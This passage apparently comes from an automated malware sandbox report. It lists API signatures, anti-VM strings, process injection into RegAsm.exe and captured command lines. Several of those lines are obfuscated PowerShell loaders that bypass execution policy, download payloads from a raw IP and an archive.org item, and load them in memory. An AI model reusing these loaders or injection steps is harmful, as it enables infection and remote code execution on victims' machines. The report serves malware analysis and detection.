                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5712Thread sleep time: -14544000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_0040928E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,11_2_0041C322
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,11_2_0040C388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_004096A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,11_2_00408847
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00407877 FindFirstFileW,FindNextFileW,11_2_00407877
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044E8F9 FindFirstFileExA,11_2_0044E8F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,11_2_0040BB6B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,11_2_00419B86
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,11_2_0040BD72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,11_2_00407CD2
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: powershell.exe, 00000003.00000002.2169309335.00000000055A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                      Source: wscript.exe, 00000006.00000003.2162243361.00000000051C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: powershell.exe, 00000003.00000002.2169309335.00000000055A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000003.00000002.2177854722.0000000008B6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0
                      Source: powershell.exe, 00000003.00000002.2177473162.0000000008B0D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2177473162.0000000008B52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: wscript.exe, 00000006.00000003.2162243361.00000000051C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: powershell.exe, 00000009.00000002.2281731880.0000000007690000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
                      Source: powershell.exe, 00000003.00000002.2169309335.00000000055A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                      Source: RegAsm.exe, 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_11-48851
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00434A8A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041CBE1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00443355 mov eax, dword ptr fs:[00000030h]11_2_00443355
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004120B2 GetProcessHeap,HeapFree,11_2_004120B2
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0043503C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00434A8A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0043BB71
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00434BD8 SetUnhandledExceptionFilter,11_2_00434BD8

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Yara detected Powershell decode and execute
                      Source: Yara matchFile source: amsi32_1600.amsi.csv, type: OTHER
                      Bypasses PowerShell execution policy
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                      Injects a PE file into a foreign processes
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 97B008Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe11_2_00412132
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00419662 mouse_event,11_2_00419662
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs" Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9FA0.tmp" "c:\Users\user\AppData\Local\Temp\rfrvbpim\CSCF3108577CD134F5DA2E7D7F2BD5C877.TMP"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jdbgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10evblicagicagicagicagicagicagicagicagicagicagicaglw1ftwjlckrfrmlosxrjt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjstu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagihhzd0isc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagdknbew1xsfcsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagc0rylhvpbnqgicagicagicagicagicagicagicagicagicagicagicbmuixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbnchlsc3voktsnicagicagicagicagicagicagicagicagicagicagicaglw5btwugicagicagicagicagicagicagicagicagicagicagicaia28iicagicagicagicagicagicagicagicagicagicagicaglu5btuvzugfjrsagicagicagicagicagicagicagicagicagicagicagihpncmz6qmtebgllicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicqwrjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzewnc4xnjgumziumtq4lzm0ns9uawnlbwvldgluz3nvznbpy3r1cmvjbgvhcnroaw5nc3rvymuudelgiiwijgvudjpbufbeqvrbxg5py2vtzwv0aw5nc29mcgljdhvyzwnszwfydghpbmdzdg9illzicyismcwwkttzdgfyvc1ztgvfccgzktttvgfsvcagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcbmljzw1lzxrpbmdzb2zwawn0dxjly2xlyxj0agluz3n0b2iuvmjzig=='+[char]0x22+'))')))"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jdbgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10evblicagicagicagicagicagicagicagicagicagicagicaglw1ftwjlckrfrmlosxrjt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjstu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagihhzd0isc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagdknbew1xsfcsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagc0rylhvpbnqgicagicagicagicagicagicagicagicagicagicagicbmuixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbnchlsc3voktsnicagicagicagicagicagicagicagicagicagicagicaglw5btwugicagicagicagicagicagicagicagicagicagicagicaia28iicagicagicagicagicagicagicagicagicagicagicaglu5btuvzugfjrsagicagicagicagicagicagicagicagicagicagicagihpncmz6qmtebgllicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicqwrjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzewnc4xnjgumziumtq4lzm0ns9uawnlbwvldgluz3nvznbpy3r1cmvjbgvhcnroaw5nc3rvymuudelgiiwijgvudjpbufbeqvrbxg5py2vtzwv0aw5nc29mcgljdhvyzwnszwfydghpbmdzdg9illzicyismcwwkttzdgfyvc1ztgvfccgzktttvgfsvcagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcbmljzw1lzxrpbmdzb2zwawn0dxjly2xlyxj0agluz3n0b2iuvmjzig=='+[char]0x22+'))')))"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 